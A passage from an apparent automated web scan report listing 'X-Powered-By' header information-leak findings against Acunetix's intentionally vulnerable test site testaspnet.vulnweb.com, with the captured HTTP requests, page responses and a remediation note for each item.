          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        7. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 14245
          
          
          Response body (14245 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        8. GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13914
          
          
          Response body (13914 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a>
          						<DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        9. GET http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        10. GET http://testaspnet.vulnweb.com/images/comment-after.gif
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (347 bytes)
          GET http://testaspnet.vulnweb.com/images/comment-after.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "2c6507199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 1957
          
          
          Response body (1957 bytes)
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        11. GET http://testaspnet.vulnweb.com/images/comment-before.gif
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (348 bytes)
          GET http://testaspnet.vulnweb.com/images/comment-before.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (248 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:54 GMT
          Accept-Ranges: bytes
          ETag: "6a79f47099c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 1919
          
          
          Response body (1919 bytes)
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        12. GET http://testaspnet.vulnweb.com/images/logo_acunetix.gif
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

